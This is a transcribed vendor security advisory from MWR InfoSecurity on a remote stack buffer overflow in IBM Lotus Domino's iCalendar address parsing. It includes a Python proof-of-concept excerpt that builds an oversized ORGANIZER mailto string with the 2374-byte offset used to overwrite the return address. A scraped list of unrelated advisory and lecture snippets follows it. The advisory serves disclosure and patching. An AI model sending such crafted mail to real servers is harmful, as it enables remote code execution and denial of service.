MWR InfoSecurity Security Advisory. IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability. 14 th September 2010
|
|
- Dominic Richard
- 6 years ago
- Views:
Transcription
1 MWR InfoSecurity Security Advisory IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability 14 th September Page 1 of 8
2 CONTENTS CONTENTS 1 Detailed Vulnerability Description Introduction Technical Background Exploit Information Dependencies Recommendations Page 2 of 8
3 IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability Package Name: Lotus Domino Server Date Reported: Affected Versions: Versions 8.0 and 8.5 on AIX, AIX 64bit, Linux, Linux iseries, Linux zseries, Solaris, Windows, Windows 64bit, z/os CVE Reference Not Yet Assigned Author A. Plaskett Severity High Risk Local/Remote Remote Impact The vulnerability would enable an attacker to execute arbitrary code on the system in the context of the currently executing nrouter process. Vulnerability Class Stack based buffer overflow Vendor URL Version 8.0, 8.5 Vendor Response A patch is available from: 01.ibm.com/support/docview.wss?rs=475&uid=swg Exploit Details Included Yes (Proof of concept code included). Overview: An unauthenticated remote code execution vulnerability was identified in the code handling the conversion and checking of an icalendar address parameter. An overly large address string can lead to the overflow of a stack allocated buffer due to insufficient bounds checking when a CStrcpy (string copy) is performed. A remote, unauthenticated attacker could execute code in the context of the Lotus Domino server process (nrouter.exe) by sending a specially crafted malicious to the Lotus Domino SMTP server. Impact: The vulnerability would enable an attacker to execute arbitrary code on the system in the context of the currently executing nrouter process. In the majority of installations this will be with local SYSTEM privileges. This could also be used to disrupt legitimate access to the services provided. Cause: This vulnerability is caused by the lack of bounds checking when performing a string copy operation (Cstrcpy) into a fixed size stack based buffer. Interim Workaround: It may be possible to filter malicious mails of this type out using upstream filtering. However, full mitigation will require patching of the domino server. Solution: It is recommended that the vendor supplied patch is installed from 01.ibm.com/support/docview.wss?rs=475&uid=swg Page 3 of 8
4 Detailed Vulnerability Description 1 Detailed Vulnerability Description 1.1 Introduction Lotus Domino is currently developed by IBM and described by the vendor as follows: IBM Lotus Domino software is a world class platform for critical business, collaboration, and messaging applications. It delivers highly reliable, scalable, and security-rich applications at a low total cost of ownership, helping companies enhance the productivity of people, streamline business processes and improve overall business responsiveness. Source: icalendar is described as follows: icalendar is an Internet standard (RFC 2445) for deploying interoperable calendaring and scheduling services for the Internet. The standard is sometimes referred to as ical. The icalendar format is suitable as an exchange format between applications or systems, thereby allowing users of different Internet mail applications to exchange calendar information. icalendar information is formatted as a Multipurpose Internet Mail Extensions (MIME) content type: text/calendar. MIME enables the object to be exchanged using several transports, including SMTP, HTTP, a file system, and desktop interactive protocols such as the clipboard or drag-anddrop interactions, point-to-point asynchronous communication, and wired-network transport. icalendar allows users to send meeting requests and tasks to other users through . Recipients of the icalendar (with supported software) can respond to the sender easily, or they can counter-propose another meeting date or time. icalendar is implemented and supported by a large number of products. Source: icalendar/index.html 1.2 Technical Background The vulnerability exists due to a lack of bounds checking performed in the function nnotes!mailcheck821address before performing a string copy operation (Cstrcpy)..text:602738F7 push esi.text:602738f8 push edx.text:602738f9 call Cstrcpy The ESI register holds the source address of the copy, which is read from the icalendar and so is under an attacker s control. The EDX register holds the address of the fixed size stack buffer. Consequently, the Cstrcpy operation can be passed a string which overflows the fixed size stack based buffer and causes memory corruption. This memory corruption can be used to hijack the flow of execution of the program and execute arbitrary code Page 4 of 8
5 Detailed Vulnerability Description 1.3 Exploit Information An attacker could exploit this vulnerability by crafting an containing an icalendar with an address string which is sufficiently long to overwrite stack based variables and also overwrite the saved return address which is stored in the stack frame (the required string length being 2374 bytes). The attacker could then pass an address which would be used to overwrite the saved return address. When the function returns, the return address is popped off the stack and loaded into the EIP (Extended Instruction Pointer) register. At this point, the attacker has full control over the execution of the program and can execute their desired code. The following proof of concept Python code excerpt can be used to trigger the vulnerability with the malicious ORGANIZER mailto address: ret_address = BBBB overflow = ("A" * 2374) + ret_address + ("C" * 6632) organiser = "ORGANIZER:mailto:H@%s.com" % overflow body = "Content-Type: text/calendar; method=counter; charset="utf-8" Subject: sent_mail2.txt MIME-Version: 1.0 Content-Transfer-Encoding: 8bit BEGIN:VCALENDAR METHOD:COUNTER PRODID:-//HGOPO@VDGCOHBCOGHRO@GQHOOPGHHCCCGCBGGCLGMCPN// VERSION:2.0 BEGIN:VEVENT UID:KORBOOGGGOHGNIH SEQ:2 RRULE:aaaa %s ATTENDEE;:Mailto:aaaa@localdomain SUMMARY:PGOMG@OMPGR@KOFMEOPNCMH DTSTART: T093000Z DTEND: T093000Z DTSTAMP: T083147Z LOCATION:Location STATUS:aaaa END:VEVENT END:VCALENDAR % organiser If this is delivered to a Lotus Domino SMTP server, nrouter will perform the following calls: c 60ca844c 094dddb8 nnotes!mailcheck821address+0xb c f8 nnotes!note2ical+0x1c25c a f8 094de824 nnotes!ical2notesextract+0x c7 06e41f ac nrouter+0x3ee9e c7 06e41f62 nrouter+0x3f1cd 02a19f c7 nrouter+0x1c a f23325 nrouter+0x1ddd a nrouter+0x1e3a5 029b nrouter+0x1e6ed dffd4 7751b3f5 nnotes!osprocessisgui+0xef e454e kernel32!basethreadinitthunk+0x12 600fe ntdll!rtlinitializeexceptionchain+0x63 600fe ntdll!rtlinitializeexceptionchain+0x Page 5 of 8
6 Detailed Vulnerability Description Leading to the incorrectly bounded Cstrcpy function being called and the return address being overwritten with , which will then be loaded into the EIP register. At this point the attacker has full control over the flow of execution of the program (nrouter.exe). 1.4 Dependencies In order to exploit this vulnerability an attacker would need to know the address of a valid Lotus Domino mailbox account. It should be noted, however, that no user interaction is required for the vulnerability to be triggered (nrouter will process the automatically) Page 6 of 8
7 Recommendations 2 Recommendations It is recommended that all users install the appropriate security patch released by the vendor in response to this issue. Links to the updated software can be found at the following location: Page 7 of 8
8 MWR InfoSecurity St. Clement House 1-3 Alencon Link Basingstoke, RG21 7SB Tel: +44 (0) Fax: +44 (0) mwrinfosecurity.com Page 8 of 8
MWR InfoSecurity Security Advisory. IBM Lotus Domino Accept- Language Stack Overflow. 20 th May Contents
Contents MWR InfoSecurity Security Advisory IBM Lotus Domino Accept- Language Stack Overflow 20 th May 2008 2008-05-20 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description...5 1.1 Introduction...5
More information12 th January MWR InfoSecurity Security Advisory. WebSphere MQ xcsgetmem Heap Overflow Vulnerability. Contents
Contents MWR InfoSecurity Security Advisory WebSphere MQ xcsgetmem Heap Overflow Vulnerability 12 th January 2009 2009-01-05 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...5 1.1 Introduction...5
More informationMWR InfoSecurity Security Advisory. IBM WebSphere MQ - rrilookupget Remote Denial of Service Vulnerability. 4th March 2010
MWR InfoSecurity Security Advisory IBM WebSphere MQ - rrilookupget Remote Denial of Service Vulnerability 4th March 2010 2010-03-04 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...
More informationMWR InfoSecurity Security Advisory. Intersystems Caché CSP (Caché Server Pages) Stack Overflow. 17 th December 2009
MWR InfoSecurity Security Advisory Intersystems Caché CSP (Caché Server Pages) Stack Overflow 17 th December 2009 2009-12-17 Page 1 of 8 CONTENTS CONTENTS 1 Detailed Vulnerability Description... 5 1.1
More informationMWR InfoSecurity Security Advisory. IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability. 4th March 2010
MWR InfoSecurity Security Advisory IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability 4th March 2010 2010-03-04 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...
More informationMWR InfoSecurity Security Advisory. Linux USB Device Driver - Buffer Overflow. 29 th October Contents
Contents MWR InfoSecurity Security Advisory Linux USB Device Driver - Buffer Overflow 29 th October 2009 2009-10-29 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description... 4 1.1 Technical
More informationMWR InfoSecurity Security Advisory. Sophos RMS / TAO Component DoS Vulnerability. 16 th January Contents
Contents MWR InfoSecurity Security Advisory Sophos RMS / TAO Component DoS Vulnerability 16 th January 2009 2009-01-16 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...5 1.1 Introduction...5
More informationMWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS
Quit MWR InfoSecurity Advisory Elastic Path Administrative Session Hijacking through Embedded XSS 26 th April 2007 2007-04-26 1 of 7 INDEX 1 Detailed Vulnerability description...4 1.1 Introduction...4
More informationMWR InfoSecurity Security Advisory. Oracle Enterprise Manager SQL Injection Advisory. 1 st February 2010
MWR InfoSecurity Security Advisory Oracle Enterprise Manager SQL Injection Advisory 1 st February 2010 2010-11-12 Page 1 of 8 CONTENTS CONTENTS 1 Detailed Vulnerability Description... 4 1.1 Introduction...
More informationMWR InfoSecurity Security Advisory. DotNetNuke Cross Site Request Forgery Vulnerability Contents
Contents MWR InfoSecurity Security Advisory DotNetNuke Cross Site Request Forgery Vulnerability 2010-06-14 2010-06-14 Page 1 of 7 Contents Contents 1 Detailed Vulnerability Description... 4 1.1 Introduction...
More informationMWR InfoSecurity Security Advisory. Mozilla Firefox 64-Bit SetTextInternal () Heap Buffer Overflow. 23 rd June 2010
MWR InfoSecurity Security Advisory Mozilla Firefox 64-Bit SetTextInternal () Heap Buffer Overflow 23 rd June 2010 Package Name: Mozilla Firefox Discovery Date: 14 th December 2009 Affected Versions: Firefox
More informationBrave New 64-Bit World. An MWR InfoSecurity Whitepaper. 2 nd June Page 1 of 12 MWR InfoSecurity Brave New 64-Bit World
Brave New 64-Bit World An MWR InfoSecurity Whitepaper 2 nd June 2010 2010-06-02 Page 1 of 12 Abstract Abstract Memory requirements on server and desktop systems have risen considerably over the past few
More informationMicrosoft Office Protected-View Out-Of- Bound Array Access
Microsoft Office Protected-View Out-Of- Bound Array Access 2017-11-23 Software Microsoft Office Affected Versions Microsoft Excel 2010, 2013, 2016 (x86 and x64) CVE Reference Author Severity Vendor CVE-2017-8502
More informationMicrosoft Office Protected-View Out-Of- Bound Array Access
Microsoft Office Protected-View Out-Of- Bound Array Access 2017-11-23 Software Microsoft Office Affected Versions Microsoft Excel 2010, 2013, 2016 (x86 and x64) CVE Reference Author Severity Vendor CVE-2017-8692
More informationConfiguring the icalendar Export Feature in Oracle HRMS Applications. An Oracle White Paper June 2009
Configuring the icalendar Export Feature in Oracle HRMS Applications An Oracle White Paper June 2009 1 Configuring the icalendar Export Feature in Oracle HRMS Applications... 1 icalendar Download Feature...
More informationSA31675 / CVE
Generated by Secunia 10 September, 2008 5 pages Table of Contents Introduction 2 Technical Details 2 Exploitation 4 Characteristics 4 Tested Versions 4 Fixed Versions 5 References 5 Generated by Secunia
More informationDocumentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
Documentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit about a generic way to exploit Linux targets written by Kingcope Introduction In May 2013 a security advisory was announced
More informationSecurity Advisory. Network Time Protocol Vulnerabilities
Security Advisory Network Time Protocol Vulnerabilities Dec 29, 2014 TABLE OF CONTENTS GENERAL... 2 CVE-2014-9293 Insufficient Entropy in PRNG... 2 CVE-2014-9294 Use of Cryptographically Weak Pseudo-Random
More informationIBM Lotus Domino WebMail
Help increase business efficiency by extending easy-to-use, cost-effective Lotus Domino e-mail to more of your organization IBM Lotus Domino WebMail Highlights Provides basic browser-based Supports multiple
More informationMicrosoft Office CTaskSymbol Use- After-Free Vulnerability
Microsoft Office CTaskSymbol Use- After-Free Vulnerability 17/08/2015 Software: Microsoft Office Affected Versions: MS Office 2013 SP1 (x86, x64) CVE Reference: Author: Severity: Vendor: Vendor Response:
More informationCalendering Extensions Internet-Draft Intended status: Informational Expires: January 24, 2018 K. Murchison, Ed. FastMail July 23, 2017
Calendering Extensions Internet-Draft Intended status: Informational Expires: January 24, 2018 C. Daboo Apple A. Quillaud Oracle K. Murchison, Ed. FastMail July 23, 2017 CalDAV Managed Attachments draft-ietf-calext-caldav-attachments-03
More informationSA30228 / CVE
Generated by Secunia 29 May, 2008 5 pages Table of Contents Introduction 2 Technical Details 2 Exploitation 4 Characteristics 4 Tested Versions 5 Fixed Versions 5 References 5 Generated by Secunia 29 May,
More informationLecture 1: Buffer Overflows
CS5431 Computer Security Practicum Spring 2017 January 27, 2017 1 Conficker Lecture 1: Buffer Overflows Instructor: Eleanor Birrell In November 2008, a new piece of malware was observed in the wild. This
More informationUniversità Ca Foscari Venezia
Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C
More informationicalendar Recurrence Problems and Recommendations Version: 1.0 Date:
CALCONNECT DOCUMENT CD 0604 Type: Recommendation Title: icalendar Recurrence Problems and Recommendations Version: 1.0 Date: 2006-03-16 Status: Published Source: RECURR Technical Committee This document
More informationCS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly
Raluca Popa Spring 2018 CS 161 Computer Security Discussion 1 Week of January 22, 2018: GDB and x86 assembly Objective: Studying memory vulnerabilities requires being able to read assembly and step through
More informationMy other computer is YOURS!
Octet-based encoding example Here is a DER encoding of the following definition: Person ::= SEQUENCE { first UTF8String, last UTF8String } myself ::= Person { first "Nathanael", last "COTTIN" } Octet-based
More informationBuffer Overflow Defenses
Buffer Overflow Defenses Some examples, pros, and cons of various defenses against buffer overflows. Caveats: 1. Not intended to be a complete list of products that defend against buffer overflows. 2.
More informationSA28083 / CVE
Generated by Secunia 9 April, 2008 5 pages Table of Contents Introduction 2 Technical Details 2 Exploitation 4 Characteristics 4 Affected Versions 5 Fixed Versions 5 References 5 Generated by Secunia 9
More informationHow to perform the DDoS Testing of Web Applications
How to perform the DDoS Testing of Web Applications Peerlyst November 02, 2017 Nasrumminallah Zeeshan (zeeshan@nzwriter.com) A Denial of Service (DoS) attack is consisted of carrying out traffic flooding
More informationMCAFEE FOUNDSTONE FSL UPDATE
2018-MAR-30 FSL version 7.6.14 MCAFEE FOUNDSTONE FSL UPDATE To better protect your environment McAfee has created this FSL check update for the Foundstone Product Suite. The following is a detailed summary
More informationIBM Lotus Domino Web Access 6.5.1
Integrate people and business processes by providing browser-based access to Lotus Domino for messaging, collaboration and PIM capabilities IBM Lotus Domino Web Access 6.5.1 Highlights Lets you access
More informationObjectives CINS/F1-01
Email Security (1) Objectives Understand how e-mail systems operate over networks. Classify the threats to the security of e-mail. Study how S/MIME and PGP can be used to add security to e-mail systems.
More informationSnort Rules Classification and Interpretation
Snort Rules Classification and Interpretation Pop2 Rules: Class Type Attempted Admin(SID: 1934, 284,285) GEN:SID 1:1934 Message POP2 FOLD overflow attempt Summary This event is generated when an attempt
More informationNetwork Working Group Request for Comments: Oracle L. Dusseault CommerceNet March 2007
Network Working Group Request for Comments: 4791 Category: Standards Track C. Daboo Apple B. Desruisseaux Oracle L. Dusseault CommerceNet March 2007 Status of This Memo Calendaring Extensions to WebDAV
More informationDepartment of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I
Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY 6.858 Fall 2010 Quiz I All problems are open-ended questions. In order to receive credit you must answer
More informationIs stack overflow still a problem?
Morris Worm (1998) Code Red (2001) Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 31st January 2017 Memory corruption Buffer overflow remains
More informationEnterprise Password Assessment Solution. The Future of Password Security is Here
Enterprise Password Assessment Solution The Future of Password Security is Here EPAS Audit The number one risk of any IT security architecture, no matter how thorough and extensive, remains the human factor
More informationAbysssec Research. 1) Advisory information. 2) Not vulnerable version
Abysssec Research 1) Advisory information Title : Java CMM readmabcurvedata stack overflow Version : Java runtime
More informationCSC 591 Systems Attacks and Defenses Stack Canaries & ASLR
CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer
More informationCNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux
CNIT 127: Exploit Development Ch 2: Stack Overflows in Linux Stack-based Buffer Overflows Most popular and best understood exploitation method Aleph One's "Smashing the Stack for Fun and Profit" (1996)
More informationSECURE INFORMATION EXCHANGE: REFERENCE ARCHITECTURE
SECURE INFORMATION EXCHANGE: REFERENCE ARCHITECTURE MAY 2017 A NEXOR WHITE PAPER NEXOR 2017 ALL RIGHTS RESERVED CONTENTS 3 4 5 6 8 9 10 11 12 14 15 16 INTRODUCTION THREATS RISK MITIGATION REFERENCE ARCHITECTURE
More informationConsiderations of planning to upgrading to Lotus Notes/Domino 6.5
Considerations of planning to upgrading to Lotus Notes/Domino 6.5 IBM Software Services 25 May 2004 Planning for an upgrade Justifying the upgrade Analyzing the impact Re-architecting the infrastructure
More informationBuffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.
Outline Morris Worm (1998) Infamous attacks Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 23rd January 2014 Recap Simple overflow exploit
More informationBuffer Overflows Defending against arbitrary code insertion and execution
www.harmonysecurity.com info@harmonysecurity.com Buffer Overflows Defending against arbitrary code insertion and execution By Stephen Fewer Contents 1 Introduction 2 1.1 Where does the problem lie? 2 1.1.1
More informationIBM Lotus Domino 7 Performance Improvements
IBM Lotus Domino 7 Performance Improvements Razeyah Stephen, IBM Lotus Domino Performance Team Rob Ingram, IBM Lotus Domino Product Manager September 2005 Table of Contents Executive Summary...3 Impacts
More informationExploit Mitigation - PIE
Exploit Mitigation - PIE Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch ASCII Armor Arbitrary Write Overflow Local
More informationBetriebssysteme und Sicherheit Sicherheit. Buffer Overflows
Betriebssysteme und Sicherheit Sicherheit Buffer Overflows Software Vulnerabilities Implementation error Input validation Attacker-supplied input can lead to Corruption Code execution... Even remote exploitation
More information20: Exploits and Containment
20: Exploits and Containment Mark Handley Andrea Bittau What is an exploit? Programs contain bugs. These bugs could have security implications (vulnerabilities) An exploit is a tool which exploits a vulnerability
More informationBuffer overflow background
and heap buffer background Comp Sci 3600 Security Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Address Space and heap buffer
More informationLecture 4 September Required reading materials for this class
EECS 261: Computer Security Fall 2007 Lecture 4 September 6 Lecturer: David Wagner Scribe: DK Moon 4.1 Required reading materials for this class Beyond Stack Smashing: Recent Advances in Exploiting Buffer
More informationCSC 591 Systems Attacks and Defenses Return-into-libc & ROP
CSC 591 Systems Attacks and Defenses Return-into-libc & ROP Alexandros Kapravelos akaprav@ncsu.edu NOEXEC (W^X) 0xFFFFFF Stack Heap BSS Data 0x000000 Code RW RX Deployment Linux (via PaX patches) OpenBSD
More informationSecurity Advisory Relating to the Speculative Execution Vulnerabilities with some microprocessors
SECURITY ADVISORY Processor based Speculative Execution Vulnerabilities AKA Spectre and Meltdown Version 1.6 Security Advisory Relating to the Speculative Execution Vulnerabilities with some microprocessors
More informationControl Flow Hijacking Attacks. Prof. Dr. Michael Backes
Control Flow Hijacking Attacks Prof. Dr. Michael Backes Control Flow Hijacking malicious.pdf Contains bug in PDF parser Control of viewer can be hijacked Control Flow Hijacking Principles Normal Control
More informationDepartment of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I
Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY 6.858 Fall 2010 Quiz I All problems are open-ended questions. In order to receive credit you must answer
More informationRBS NetGain Enterprise Manager Multiple Vulnerabilities of 11
RBS-2018-004 NetGain Enterprise Manager Multiple Vulnerabilities 2018-03-22 1 of 11 Table of Contents Vendor / Product Information 3 Vulnerable Program Details 3 Credits 3 Impact 3 Vulnerability Details
More informationAdon'tbe an Adobe victim
Adon'tbe an Adobe victim An overview of how recent Adobe-related flaws affect your web application Joshua Stabiner EY Agenda Introductions Background Cross-site scripting (PDF) Overview Exploit Mitigation
More informationProduct Security Briefing
Product Security Briefing Performed on: Adobe ColdFusion 8 Information Risk Management Plc 8th Floor Kings Building Smith Square London SW1 P3JJ UK T +44 (0)20 7808 6420 F +44 (0)20 7808 6421 Info@irmplc.com
More informationRBS Axis Products Management Web Interface Multiple Vulnerabilities of 9
RBS-2018-003 Axis Products Management Web Interface Multiple Vulnerabilities 2018-05-23 1 of 9 Table of Contents Table of Contents... 2 Vendor / Product Information.... 3 Vulnerable Program Details.. 3
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 14: Software Security Department of Computer Science and Engineering University at Buffalo 1 Software Security Exploiting software vulnerabilities is paramount
More informationOpenSync. Daniel Gollub SUSE Linux Products GmbH
OpenSync Daniel Gollub SUSE Linux Products GmbH Content Synchronization Today What is OpenSync? Synchronization Framework Plugins Different ways of Syncing Capabilities and Merger Quick
More informationStack Overflow COMP620
Stack Overflow COMP620 There are two kinds of people in America today: those who have experienced a foreign cyber attack and know it, and those who have experienced a foreign cyber attack and don t know
More informationINFLUENTIAL OPERATING SYSTEM RESEARCH: SECURITY MECHANISMS AND HOW TO USE THEM CARSTEN WEINHOLD
Faculty of Computer Science Institute of Systems Architecture, Operating Systems Group INFLUENTIAL OPERATING SYSTEM RESEARCH: SECURITY MECHANISMS AND HOW TO USE THEM CARSTEN WEINHOLD OVERVIEW Fundamental
More informationSyscall Proxying. Simulating Remote Execution. Maximiliano Cáceres.
Syscall Proxying Maximiliano Cáceres maximiliano.caceres@corest.com Caesars Palace, Las Vegas, NV, USA July 31st, 2002 Agenda General Concepts Syscall Proxying A first implementation Optimizing for size
More informationStack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta
1 Stack Vulnerabilities CS4379/5375 System Security Assurance Dr. Jaime C. Acosta Part 1 2 3 An Old, yet Still Valid Vulnerability Buffer/Stack Overflow ESP Unknown Data (unused) Unknown Data (unused)
More informationarchiving with the IBM CommonStore solution
IBM Software Group E-mail archiving with the IBM CommonStore solution Comprehensive flexible reliable Borut Obran Genis d.o.o. 2006 IBM Corporation Agenda Overview Mailbox management Discovery Compliance
More informationTitle: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)
Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs) Document last modified on: 17th September 2009 Date of discovery of vulnerabilities: December
More information(Early) Memory Corruption Attacks
(Early) Memory Corruption Attacks CS-576 Systems Security Instructor: Georgios Portokalidis Fall 2018 Fall 2018 Stevens Institute of Technology 1 Memory Corruption Memory corruption occurs in a computer
More informationCS 356 Operating System Security. Fall 2013
CS 356 Operating System Security Fall 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists Chapter 5 Database
More informationISA564 SECURITY LAB. Code Injection Attacks
ISA564 SECURITY LAB Code Injection Attacks Outline Anatomy of Code-Injection Attacks Lab 3: Buffer Overflow Anatomy of Code-Injection Attacks Background About 60% of CERT/CC advisories deal with unauthorized
More informationAttacking the Linux PRNG on Android. David Kaplan, Sagi Kedmi, Roee Hay & Avi Dayan IBM Security Systems
Attacking the Linux PRNG on Android David Kaplan, Sagi Kedmi, Roee Hay & Avi Dayan IBM Security Systems MOTIVATION motivation_keystore_buffer_overflow We discovered CVE-2014-3100, a stack-based Buffer
More informationCMPSC 497 Buffer Overflow Vulnerabilities
Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA CMPSC 497 Buffer Overflow
More informationAnalysis of MS Multiple Excel Vulnerabilities
Analysis of MS-07-036 Multiple Excel Vulnerabilities I. Introduction This research was conducted using the Office 2003 Excel Viewer application and the corresponding security patch for MS-07-036 - Vulnerabilities
More informationAbysssec Research. 1) Advisory information. 2) Vulnerable version. : Microsoft Excel SxView Record Parsing Memory Corruption
Abysssec Research 1) Advisory information Title Version Analysis Vendor Impact Contact Twitter CVE : Microsoft Excel SxView Record Parsing Memory Corruption : Excel 2002 SP3 : http://www.abysssec.com :
More informationPRESENTED BY: SANTOSH SANGUMANI & SHARAN NARANG
PRESENTED BY: SANTOSH SANGUMANI & SHARAN NARANG Table of contents Introduction Binary Disassembly Return Address Defense Prototype Implementation Experimental Results Conclusion Buffer Over2low Attacks
More informationPractical Techniques for Regeneration and Immunization of COTS Applications
Practical Techniques for Regeneration and Immunization of COTS Applications Lixin Li Mark R.Cornwell E.Hultman James E. Just R. Sekar Stony Brook University Global InfoTek, Inc (Research supported by DARPA,
More informationBeyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus(MSR) and Brandon Baker (MS) Buffer Overflows and How they Occur Buffer is a contiguous segment of memory of a fixed
More informationAbysssec Research. 1) Advisory information. 2) Vulnerability Information. Class 1- Stack overflow. Impact
Abysssec Research 1) Advisory information Title Version Analysis Vendor Impact Contact Twitter : Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow : NWFTPD.NLM 5.09.02 (Netware 6.5 SP8)
More informationCVE : https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve
Component: Kernel CVSS Score: 6.2 CVE-2013-4312: https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-4312 The Linux kernel before 4.4.1 allows local users to bypass file-descriptor limits and cause
More informationFunction Call Convention
Function Call Convention Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch Content Intel Architecture Memory Layout
More informationSYMANTEC ENTERPRISE SECURITY. Symantec Internet Security Threat Report September 2005 Power and Energy Industry Data Sheet
SYMANTEC ENTERPRISE SECURITY Symantec Internet Security Threat Report September 00 Power and Energy Industry Data Sheet An important note about these statistics The statistics discussed in this document
More informationBuffer overflows (a security interlude) Address space layout the stack discipline + C's lack of bounds-checking HUGE PROBLEM
Buffer overflows (a security interlude) Address space layout the stack discipline + C's lack of bounds-checking HUGE PROBLEM x86-64 Linux Memory Layout 0x00007fffffffffff not drawn to scale Stack... Caller
More informationExploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it
Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it 29.11.2012 Secure Software Engineering Andreas Follner 1 Andreas Follner Graduated earlier
More informationCIS 551 / TCOM 401 Computer and Network Security. Spring 2007 Lecture 2
CIS 551 / TCOM 401 Computer and Network Security Spring 2007 Lecture 2 Announcements First project is on the web Due: Feb. 1st at midnight Form groups of 2 or 3 people If you need help finding a group,
More informationRakenduste integreerimine Enn Õunapuu.
Rakenduste integreerimine Enn Õunapuu enn@cc.ttu.ee Integration File Transfer One application writes a file that another later reads. The applications need to agree on the filename and location, the
More information2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks
Runtime attacks are major threats to today's applications Control-flow of an application is compromised at runtime Typically, runtime attacks include injection of malicious code Reasons for runtime attacks
More informationCNIT 127: Exploit Development. Ch 1: Before you begin. Updated
CNIT 127: Exploit Development Ch 1: Before you begin Updated 1-14-16 Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend, such as Denial
More informationIdentity-based Access Control
Identity-based Access Control The kind of access control familiar from operating systems like Unix or Windows based on user identities This model originated in closed organisations ( enterprises ) like
More informationAutodesk AutoCAD DWG-AC1021 Heap Corruption
security research Autodesk AutoCAD DWG-AC1021 Heap Corruption Mar 2013 AutoCAD is a software for computer-aided design (CAD) and technical drawing in 2D/3D, being one of the worlds leading CAD design tools.
More informationAbysssec Research. 1) Advisory information. 2) Vulnerable version
Abysssec Research 1) Advisory information Title : Adobe Acrobat and Reader "newclass" invalid pointer vulnerability Version :
More informationReference Guide Mulberry Internet and Calendar Client Version 4.0
Reference Guide Mulberry Internet Email and Calendar Client Version 4.0 Cyrus Daboo Pittsburgh PA USA mailto:mulberry@mulberrymail.com http://www.mulberrymail.com Information 2 in this document is subject
More informationString Oriented Programming Exploring Format String Attacks. Mathias Payer
String Oriented Programming Exploring Format String Attacks Mathias Payer Motivation Additional protection mechanisms prevent many existing attack vectors Format string exploits are often overlooked Drawback:
More informationSecure Coding Techniques
Secure Coding Techniques "... the world outside your function should be treated as hostile and bent upon your destruction" [Writing Secure Code, Howard and LeBlanc] "Distrust and caution are the parents
More informationModern Buffer Overflow Prevention Techniques: How they work and why they don t
Modern Buffer Overflow Prevention Techniques: How they work and why they don t Russ Osborn CS182 JT 4/13/2006 1 In the past 10 years, computer viruses have been a growing problem. In 1995, there were approximately
More informationRBS Rockwell Automation FactoryTalk Services Platform RNADiagnostics Module Missing Size Field Validation Remote Denial of Service.
RBS 2013 002 Rockwell Automation FactoryTalk Services Platform RNADiagnostics Module Missing Size Field Validation Remote Denial of Service 1 of 7 Table of Contents Table of Contents 2 About Risk Based
More informationMemory Corruption 101 From Primitives to Exploit
Memory Corruption 101 From Primitives to Exploit Created by Nick Walker @ MWR Infosecurity / @tel0seh What is it? A result of Undefined Behaviour Undefined Behaviour A result of executing computer code
More informationKeeping customer data safe in EC2 a deep dive. Martin Pohlack Amazon Web Services
Keeping customer data safe in EC2 a deep dive Martin Pohlack Amazon Web Services 1 Bio... Principal Engineer with Amazon Web Services I like to play with Low-level stuff Synchronization, hardware transactional
